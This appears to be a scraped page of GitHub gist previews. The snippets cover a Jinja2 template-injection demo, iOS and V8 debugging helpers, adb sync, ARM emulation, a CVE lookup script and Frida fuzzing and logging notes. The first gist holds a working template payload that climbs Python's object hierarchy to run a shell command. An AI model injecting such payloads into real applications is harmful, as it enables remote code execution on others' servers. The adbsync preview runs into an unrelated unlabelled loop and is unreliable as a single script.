@FrankSpierings
FrankSpierings / jinja-rce-.py
Created December 23, 2019 09:51
Jinja2 Code Exec
import jinja2

# SSTI demo: user-controlled template text is rendered by an unsandboxed jinja2.Template
# t = 'Variable {{ arg }}\n{% set a = arg.__class__.__base__.__subclasses__() %}{% for i in a %}{{ i }}\n{% endfor %}'
# The index into __subclasses__() depends on the Python version and the modules already loaded
t = 'Variable {{ arg }}\n{{ arg.__class__.__base__.__subclasses__()[-36]("id") }}'
template = jinja2.Template(t)
r = template.render(arg="testing")
print(r)
@PsychoTea
PsychoTea / PanicParser.py
Last active June 11, 2023 19:54
A collection of useful iOS-related scripts
import sys
import json
import re

kslide = 0x0

if len(sys.argv) < 2:
    print("Usage: PanicParser.py [file path]")
    sys.exit(1)
@justjavac
justjavac / GetOptimizationStatus.md
Last active March 3, 2025 17:17
V8 %GetOptimizationStatus

%GetOptimizationStatus returns a set of bitwise flags rather than a single value; to read them, look at the binary representation of the returned value. For example, if 65 is returned, its binary representation is the following:

(65).toString(2).padStart(12, '0');
// 000001000001

Each binary digit acts as a boolean with the following meaning:

@fxthomas
fxthomas / adbsync
Created July 3, 2019 22:31
Android <> local directory synchronization script using rsync
#!/bin/bash
# Usage: adbsync <remote path> <local path>
# <remote path> defaults to /sdcard/DCIM
# <local path> defaults to .
REMOTE_PATH=${1:-/sdcard/DCIM}
LOCAL_PATH=${2:-.}
REMOTE_PORT=1873
LOCAL_PORT=6010
IFS=$'\n'
old_process=$(ps -eo command)
while true; do
new_process=$(ps -eo command)
diff <(echo "$old_process") <(echo "$new_process") | grep '[<>]'
sleep 1
old_process=$new_process
done
@luk6xff
luk6xff / ARMonQEMUforDebianUbuntu.md
Last active May 13, 2025 12:57 — forked from bruce30262/ARMDebianUbuntu.md
Emulating ARM with QEMU on Debian/Ubuntu

You might want to read this to get an introduction to armel vs armhf.

If the below is too much, you can try Ubuntu-ARMv7-Qemu but note it contains non-free blobs.

Running ARM programs under Linux (without starting a QEMU VM!)

First, cross-compile the user programs with the GCC-ARM toolchain. Then install qemu-arm-static so that you can run ARM executables directly on Linux.

If there is no qemu-arm-static in the package list, install qemu-user-static instead.

import urllib.request, json, sys, textwrap

# Run like
# python3 pubsploit.py CVE-2017-0143

def cveSearch(cve):
    # Query the public CVE API for the given identifier
    with urllib.request.urlopen('http://cve.circl.lu/api/cve/'+cve) as url:
        data = json.loads(url.read().decode())
    try:
        if data['cvss']:
            print("{} | CVSS {}".format(cve,data['cvss']))
    except (KeyError, TypeError):  # assumed handler: the preview is cut off before the original except clause
        pass
/*
* Modified from: https://codeshare.frida.re/@dki/ios-url-scheme-fuzzing/
*
* iOS URL Scheme Fuzzing
* Usage: frida -U --codeshare dki/ios-url-scheme-fuzzing SpringBoard
*
* Open the specified URL
* openURL("somescheme://test");
*
* Fuzz a particular URL - use {0} as placeholder for insertion points
@oleavr
oleavr / frida-logging.md
Last active April 7, 2023 08:53
Frida logging hacks

Frida logging helper

For adding temporary logging to help understand behavior. For when it is impractical to use Frida to instrument Frida.

Choose one of these and copy-paste it into e.g. lib/interfaces/session.vala, then use log_event ("name='%s'", name); to log.

When something appears to be hanging, try applying: x-async-debug.patch.